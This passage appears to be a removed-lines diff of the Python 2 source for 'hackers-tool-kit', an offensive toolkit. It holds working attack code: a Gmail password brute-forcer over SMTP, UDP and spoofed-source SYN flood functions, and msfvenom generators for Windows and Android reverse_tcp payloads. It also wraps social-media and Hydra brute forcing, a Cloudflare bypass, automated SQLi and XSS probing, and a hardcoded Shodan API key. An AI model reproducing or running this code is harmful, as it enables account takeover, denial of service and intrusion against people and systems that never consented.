]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,4) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s 